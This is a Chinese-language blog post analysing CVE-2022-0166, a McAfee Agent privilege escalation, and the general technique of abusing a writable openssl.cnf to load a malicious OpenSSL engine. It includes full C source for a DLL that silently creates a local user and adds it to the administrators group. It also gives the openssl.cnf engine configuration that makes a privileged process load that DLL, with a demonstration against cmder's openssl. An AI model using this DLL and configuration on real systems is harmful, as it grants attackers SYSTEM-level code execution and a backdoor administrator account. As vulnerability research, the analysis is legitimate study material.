从CVE-2022-0166 Mcafee Agent提权学习openssl.cnf利用技巧 2022-01-27 09:49:19 Steven Xeldax ## 起因 最近一个消息引起了我的注意,mcafee的agent存在提权漏洞 ![](/download/f599dbf4-978c-4e45-9f2f-30d4eb41b1a2.png) 但是从google和twitter上搜搜就只能发现对于这个漏洞的一些直言片语 https://kc.mcafee.com/corporate/index?page=content&id=SB10378 ``` A privilege escalation vulnerability in the McAfee Agent prior to 5.7.5 affecting all supported operating systems. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory. A low privilege user could have created subdirectories and executed arbitrary code with SYSTEM privileges by creating the appropriate pathway to the specifically created malicious openssl.cnf file. ``` ![](/download/f3c01d52-6bfe-4239-9c84-eba5cfc45d7a.png) https://www.tenable.com/plugins/nessus/157126 ``` - A privilege escalation vulnerability in the McAfee Agent prior to 5.7.5. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory. A low privilege user could have created subdirectories and executed arbitrary code with SYSTEM privileges by creating the appropriate pathway to the specifically created malicious openssl.cnf file. (CVE-2022-0166) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. ``` 从这些描述上看这个漏洞不是一个二进制漏洞,貌似原因来自于攻击者可以控制openssl.cnf的文件内容并修改其中的配置进行一个提权。 除此之外我们无法获得进一步更加有效的信息,GitHub上也无法搜索到这个漏洞的poc。 ## openssl.cnf存在的历史问题 关于openssl.cnf存在的问题已经是屡见不鲜了,例如之前Acronis Cyber Backup和Cyber Protect本地提权漏洞就是和openssl cnf相关的,就连curl、openssl本身也会受到openssl.cnf问题的影响。 > https://venusense.com/new_type/aqtg/20201013/21871.html\ ![](/download/e8b2c8bf-44f6-42f6-b899-4e0caf88ad6c.png) > https://hackerone.com/reports/608577 ![](/download/bd0a7cc0-c062-4555-86c9-cdde81f4095d.png) 以及CVE-2019-12572 PIA Windows Privilege Escalation: Malicious OpenSSL Engine 也是因为能够修改openssl.cnf文件 ![](/download/b4ce6182-f996-4d11-a200-e67c327c05f0.png) ## openssl.cnf恶意文件利用 ### 静态分析openssl.cnf 使用openssl.cnf的文件一般是libeay32.dll,所以我们可以全局搜索libeay32.dll的文件 ![](/download/ddcd4cd3-6d71-4cd4-8e65-97c0f350373c.png) 通过这种办法去找可能存在问题的dll以及对应的软件。 ### 动态分析openssl.cnf 另外一种办法就是结合promon过滤调用openssl.cnf的日志,结合procmon寻找进行分析 ### 利用 第一步,寻找可以写的openssldir,我们可以使用这个工具去分析libeay32.dll https://github.com/mirchr/openssldir_check ![](/download/d3b400fd-17d2-42be-8249-cbe133bd44db.png) 假设跑出来的OPENSSLDIR我们能够写那么尽可以尝试下一步创建这个OPNESSL cnf文件。 第二步,创建一个恶意的dll ``` /* Cross Compile with x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared */ #include <windows.h> BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) { switch( fdwReason ) { case DLL_PROCESS_ATTACH: system("cmd /c net user woot insertpasswordhere /add"); system("cmd /c net localgroup administrators woot /add"); break; case DLL_THREAD_ATTACH: // Do thread-specific initialization. break; case DLL_THREAD_DETACH: // Do thread-specific cleanup. break; case DLL_PROCESS_DETACH: // Perform any necessary cleanup. break; } return TRUE; // Successful DLL_PROCESS_ATTACH. } ``` 第三步,修改openssl.cnf ``` openssl_conf = openssl_init [openssl_init] engines = engine_section [engine_section] woot = woot_section [woot_section] engine_id = woot dynamic_path = c:\\etc\\ssl\\woot.dll init = 0 ``` 最后一步,我们重新启动调用libeay32.dll的程序,然后程序会读取openssl.cnf文件并加载恶意的dll执行代码。 ## openssl.cnf实际案例 我们发现cmder中的openssl exe文件 ![](/download/fefd0410-4c29-4bfd-871f-5372acd4683a.png) 使用了C:\Program Files\Git\mingw64\ssl\openssl.cnf 的配置文件 ![](/download/93fd77c4-b32e-4a97-9305-75f14855a5a5.png) 我们修改这个cnf文件并指向一个恶意的dll(这个dll会弹计算器) ``` openssl_conf = openssl_init [openssl_init] engines = engine_section [engine_section] woot = woot_section [woot_section] engine_id = woot dynamic_path = d:\\Temp\\woot\\woot.dll init = 0 ``` ![](/download/b614f865-9c35-4715-b2a5-ea58b3d345dd.png) 再次执行发现openssl发现成功加载了这个dll并执行了计算器 ![](/download/1154cb9b-5b76-4b54-bf10-57ba8b05c4c9.png) ![](/download/26247abc-bc63-4993-89dd-94848d7ecdfa.png) ## 关于CVE-2022-0166 CVE-2022-0166中使用的libeay32.dll是mcafee他们自己编译的,位置如下: ![](/download/226c5eea-a16e-4f88-be50-cc626b91a79d.png) 利用openssldir_check或者IDA可以找到OPENSSLDIR的位置 ``` D:\BUILD_1052945\BUILD\matools\build\msvc\ma_tools_outdir\openssl\ssl ``` ![](/download/c960fdb2-c291-47fb-bce4-8d93945e84d9.png) 然后创建openssl.cnf文件植入恶意配置和dll ![](/download/6085974b-acda-4e2f-9c15-42126079ddf5.png)